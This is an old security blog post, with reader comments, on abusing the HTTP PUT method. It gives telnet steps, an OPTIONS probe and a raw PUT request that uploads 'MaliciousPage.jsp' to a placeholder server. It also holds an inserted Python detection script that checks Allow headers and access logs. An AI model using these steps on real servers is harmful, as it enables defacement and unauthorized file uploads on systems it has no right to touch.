Application security encompasses measures taken throughout the application's life-cycle to prevent exceptions in the security policy of an application or the underlying system (vulnerabilities) through flaws in the design, development, deployment, upgrade, or maintenance of the application.

Wednesday, September 28, 2011

HTTP PUT Method Exploit

After executing the OPTIONS HTTP method you will find a list of allowed methods, which means those methods are supported by your web server. If the PUT method is in the allowed method list, it can be used to insert a page into the web server, which will lead to defacement of the website. To perform this test, follow the steps below:

First, open the command prompt and type the command below:

telnet www.TargetApplication.com 80

PUT /MaliciousPage.jsp HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: anysite
Content-Length: 2381
Connection: Keep-Alive
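
A defender-side check for the condition this post describes, as an added example that is not part of the original post: it reads the Allow header of an OPTIONS response and scans access-log lines for PUT or DELETE requests that the server answered with a 2xx status. The Common Log Format, the extension list, the function names and the sample data are assumptions constructed for illustration.

```python
import re

# Methods that let a client change server content, plus TRACE (request echo).
RISKY_METHODS = {"PUT", "DELETE", "TRACE"}
# Assumed list of extensions a server may execute rather than serve statically.
EXECUTABLE_EXT = (".jsp", ".jspx", ".asp", ".aspx", ".php")

def risky_allowed_methods(raw_response: str) -> list[str]:
    """Return risky methods advertised in the Allow/Public headers of a raw OPTIONS response."""
    head = raw_response.replace("\r\n", "\n").split("\n\n", 1)[0]
    found = set()
    for line in head.split("\n")[1:]:  # skip the status line
        name, sep, value = line.partition(":")
        if sep and name.strip().lower() in ("allow", "public"):
            found.update(m.strip().upper() for m in value.split(",") if m.strip())
    return sorted(found & RISKY_METHODS)

# Common Log Format (assumed): host ident user [time] "METHOD path PROTO" status size
CLF = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) \S+')

def successful_writes(log_lines):
    """Yield (client, method, path, executable) for PUT/DELETE requests answered with 2xx."""
    for line in log_lines:
        m = CLF.match(line)
        if not m:
            continue
        client, method, path, status = m.groups()
        if method.upper() in ("PUT", "DELETE") and status.startswith("2"):
            executable = path.split("?", 1)[0].lower().endswith(EXECUTABLE_EXT)
            yield client, method.upper(), path, executable

# Constructed sample data (not captured from a real server).
SAMPLE_OPTIONS = (
    "HTTP/1.1 200 OK\r\n"
    "Server: Microsoft-IIS/5.0\r\n"
    "Allow: GET, HEAD, POST, TRACE, OPTIONS, PUT, DELETE\r\n"
    "Content-Length: 0\r\n\r\n"
)
SAMPLE_LOG = [
    '192.0.2.10 - - [28/Sep/2011:10:01:02 +0000] "GET /index.jsp HTTP/1.1" 200 5120',
    '192.0.2.44 - - [28/Sep/2011:10:03:17 +0000] "PUT /MaliciousPage.jsp HTTP/1.1" 201 0',
    '192.0.2.44 - - [28/Sep/2011:10:03:40 +0000] "PUT /notes.txt HTTP/1.1" 403 312',
    '192.0.2.51 - - [28/Sep/2011:10:05:00 +0000] "DELETE /old.html HTTP/1.1" 204 0',
]

if __name__ == "__main__":
    print("Risky methods advertised:", risky_allowed_methods(SAMPLE_OPTIONS))
    for hit in successful_writes(SAMPLE_LOG):
        print("Successful write:", hit)
```

An Allow header only advertises methods; a 2xx answer to a PUT in the access log is the evidence that a write actually succeeded.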

2 comments:

  1. Hi,
    Can you explain a bit more in detail on how to exploit this Vulnerability?
    Do I have to provide only the given telnet command? (telnet www.TargetApplication.com 80)

    PUT /MaliciousPage.jsp HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
    Host: anysite
    Content-Length: 2381
    Connection: Keep-Alive

    - aren't these part of the response that we receive?

  2. Hi,

    You have to telnet to the target system on the listening port (e.g. 80 or 443). After successful telnet you will get a blank window in CMD. To identify which methods are allowed in the web server you can use the OPTIONS method like below. If you have already identified the allowed methods then there is no need to perform step (1).

    (1) First open the command prompt and type the below command


    telnet www.TargetApplication.com 80
    OPTIONS / HTTP/1.1

    In response you will get the below HTTP response header from the server

    HTTP/1.1 200 OK
    Server: Microsoft-IIS/5.0
    Date: Tue, 06 Set 2011 04:32:03 GMT
    Connection: close
    Allow: GET, HEAD, POST, TRACE, OPTIONS, PUT, DELETE
    Content-Length: 0


    (2) You can directly exploit the PUT method by the below steps


    telnet www.TargetApplication.com 80


    After successful telnet you can copy and paste the below in the CMD; it will create the MaliciousPage.jsp page under the root directory. If you have the PUT method allowed at any specific directory level then you have to adjust it accordingly (like PUT /directory 1/directory 2/MaliciousPage.jsp HTTP/1.1). These are not part of the response; these are part of the request.


    PUT /MaliciousPage.jsp HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
    Host: anysite
    Content-Length: 2381
    Connection: Keep-Alive
